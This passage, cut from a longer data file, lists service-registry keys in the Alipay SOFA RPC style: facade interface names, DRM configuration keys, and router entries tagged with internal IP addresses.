FIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.DonateActivityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.113.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sffcore.ApplicationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gsmartcenter.common.service.facade.callback.GscSmartServiceCallback:1.0:girisk-GscSmartServiceCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instinfo.service.facade.spi.InstinfoSystemCallService:1.0:inslifecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_FREEZE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.asdi.AsdiDumpServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_TAXREFUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.88.64.81#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.custprod.service.api.RegistrationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.26.141#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.186.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finbaservice.biz.shared.blacklist.repository.BlackUserInfoRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.materialcenter.common.service.facade.api.material.MaterialManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_AML_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.certifycenter.service.facade.resource.CloudCertifyResourceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.notify.NotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.inspection.InspectionRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTair.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradeguard.biz.money.core.LmbMoneyFlowService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.apply.LoanBasicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bksupplychaincore.common.service.facade.receivable.api.SccReceivableFinancingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifprocess:name=com.alipay.cifprocess.drm.CIFINAgentSwitcher.timeWindowInterval,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialportal.web.task.rpc.facade.activity.ServicePackageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.framodel.core.service.facade.api.FramodelCalculateAfterIndicatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:userpsycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.xview.core.common.facade.CallbackService:1.0:minicore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.afwrobottwa:name=com.alipay.afwrobottwa.emergency.enabledGoldenChoice,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.namelist.GreyListTRService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.141.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.imif.opcenter.common.service.facade.crm.api.CommonTaskMngCrmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.equitypublishcore.common.service.facade.privateplacement.InvestmentWithdrawalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:sesameCredit_zmcustcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.common.facade.PolicyCancelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.152.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antmembermng.common.service.facade.schema.GrowthCommonOperateSchemaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csportal.service.facade.api.HkCollectingCodeTransactionQueryFacade:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iguapcenter.service.facade.GuapClientManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.108.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:alipaymember@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pcinstmng.rpc.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.routeclient.interfacename:antacl#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_ST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:barcodeprod_rzone@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.schedule.TaskhubSofaScheduler:1.0:finscenesas@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.notify.ApiNotifyRuleManageFacade:1.0:mapitool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antflow.common.base.cache.ObjectCache:1.0:antflow.objectCache@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.97.143#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.onlinetest.common.service.facade.OnlineBigDataCaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:iexpprod_opengw_in@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.deepinsight.facade.PaymentTaskManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.salesmng.common.service.facade.merchant.api.SupportServerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.impl.ExpressDrmTrigger.interceptApiStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imif.common.service.facade.api.MerchantInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxconf.service.facade.ctrl.DataStructManageService:1.0:fluxconf@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.tlou.TlouWufuPersonEntityRelationEntitySideDbFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprobe.common.service.facade.api.ApiDocService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.message.MessageConfigQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.auth.api.AuthApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstoperation.biz.daemon.msg.handler.TriggerTaskEventHandler:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.207.168#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acccenter.common.service.facade.inner.ProductKpiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.malgo.common.facade.AlgoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbgrouppurchaseprod.common.service.facade.group.GroupDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.common.service.facade.CloseRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.cert.facade.CertProductService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.core.service.recruit.drm.FinRecruitDrmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.BizAttributeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.wealthahead.facade.WealthAheadManualFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.kaproject.KaprojectDocumentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.zdal.ldc.tair.cardbinMdmTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundprod.common.service.facade.product.manage.FpGoldManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanrepay.common.service.facade.service.support.MigrateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.defincustomer.facade.util.IdGeneratorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antscheduler.facade.IHealthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlink.tuling.common.service.api.ServiceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finnet.service.facade.open.spi.FinnetSpiReceiveRService:1.0:|http://-pool.${inner.domain}:12200@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.antplatform.api.DemandManage:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mirrorprod.facade.gateway.service.PlaybackLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.zcb.facade.asset.service.ZCBAssetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.54.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insassetprod.common.service.facade.PetProfileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.common.service.facade.api.job.JobDefineManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwebupload.client.api.UploadMng:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.biz.finfoservice.repository.TransactionRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.FundFreezeLogQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricemng.common.service.facade.api.annual.PricemngPriceAnnualIndustryPoolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.message.TopicMsgSubManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.finnet.service.drm.FluxstrategyDrm3rdVersion.fluxBusinessIdentifySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.operator.common.service.facade.OperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.MachineManager#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.psbp.common.service.medical.InsuranceCardTemplatFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphasec.compass.sanctionmng.facade.SanctionDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.PmtDctBizTypeCfgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.alinode:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.businessPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:newsencequalitycenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custinsight.common.service.facade.userdata.NodeConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.RecoverService:1.0:supergwopen.t7701.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifin.bankcard.service.facade.BankCardServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.mng.CommunicateHistoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datacontextlib.service.facade.dataswap.configuration.DataSwapAcquireConfigureRemoteService:1.0:zdatacontext@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmPartnerKeyManager.partnerKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydata:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorTransmitResource.transmitIndicatorExcludeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfcenter.common.service.facade.PayReceiptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zauth.facade.ZauthQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.campaign.CampaignEvaluateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:shopAddressDataRepairHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signExpireInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.voting.VotingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:insdataprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kborderprod.common.service.facade.api.order.PurchaseOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icsmng.service.facade.kyc.UserCertifyTaskQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.runManualOrderExec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socplt.common.service.facade.SocpltAlarmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.102.238#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_INSOPENPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.cfmng.service.client.fundboss.drm.FBLinkReconDrm.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.crmhome.common.service.facade.api.merchant.MerchantInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.SecurityOfficerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:spcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlecore.service.deposit.action.OnlineDepositQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:sffmng#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.necquery.common.service.account.LoanLendDefQueryNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:trustiot@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.datasync.KbServDataSyncManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0:pullBlockSplitor_mypoint_ex@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.pdcore.common.service.facade.api.conflict.ConflictRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.iotcube.common.service.facade.openapi.whitelist.WhiteListOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.23.240.100#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditagreement.common.service.agreement.repaydate.PcreditRepayDateAgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkqamng_associate_account_process_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ha.art.mng.publish.spi.ArtPipelineSpi:1.0:strategy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bioperation.service.facade.dipper.BeidouQuestionExtensionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_GUARANTEE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lendpofprod.common.service.facade.loanapi.apply.LoanApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.service.metaInfo.facade.DeviceMetaInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfin.blockchain.mypointsgw.service.facade.CardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.215.174#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.afsc.biz.tsure.facade.TsureComponentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.manager.facade.GrpCampOpenPrizeAlgorithmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_MQ_HTTP_PROXY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0:countcore-enforceDepositBackBpmFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.antha.slm.AnthaSLMTaskManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insserviceprod.facade.InsSerProgressFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbordersync.common.service.facade.spi.OrderRemindProcessCallback:1.0:kdc-remind@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.vouchercore.service.facade.api.voucher.VoucherPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYBUMNGJSESSIONID.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsearch.common.service.facade.api.dictionary.DictionaryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocore.common.service.facade.CampQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditdecisionx@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:aclinkecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchantsettle.service.common.manage.facade.SettleManageQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.gloancore.common.service.facade.bill.api.LcBudgetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.starWishYebTimeoutMinutes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cifprocess.core.consist.handler.ConsistHandler:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.asset.FaAssetTransApplyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.risk.ChangeRiskLevelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.api.liteuser.FunctionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.normalapp:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finasmcore.common.service.facade.activity.service.XqlcRecommendInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.sub2:1.0@DEFAULT@testcloud#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.resultwrap:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecashier.service.facade.spi.CashierActivityCallbackFacade:1.0:transferprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:ecocheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:publicDomain_ropservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.normalExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.open.facade.OpenRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.26.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.payment.api.ExchangeRevokeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.katongprod.signcenter.service.write.SignCenterChangeEventService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:openapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshysale.common.service.facade.kpi.BizQuotaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobileappconfig.common.service.facade.api.MobileAppManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.imatchfacade.encourage.service.DeliveryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.api.account.CfpCorrectionVoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SETA#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.v3.invest.InvestSortRouteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCRULECENTERCOMMON#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unifiedlimit.facade.UnifiedLimitConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.socialcore.facade.taskcenter.TaskServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.88.167.209#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.apshopcenter.common.service.facade.PromotionPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imkteye.common.service.facade.api.grayexperiment.GrayExperimentManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTairRz.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bksigncentre.common.service.facade.api.InstSaleSchemeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataconsole.dr.zcache.ZcacheDrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.48.104#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ebillcenter.common.service.facade.EbillDecisionXCallBackFacade:1.0:pucprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.interact.api.InteractQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.prodmng:name=com.alipay.common.webx.session.drm.SessionLogDrm.formtokenSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.123.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitSubRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_PROMO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbaudit.common.service.facade.audit.SimpleOpenShopAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstoperation.common.service.facade.api.scalepredict.PredictProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.enterprise.api.EPSecurityprodQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.manage.facade.BudgetLibManageInTransService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.gloandecision.common.service.facade.trans.api.CreditTransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0:pcreditcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dataquality:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.sampleRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.spcenter.facade.bd.BdEmployeeOrganizationManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:iprobe@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.product.ProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.common.service.integration.tbnotify.UniformEventClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:argo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acassistant.common.service.facade.CodeTemplateFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.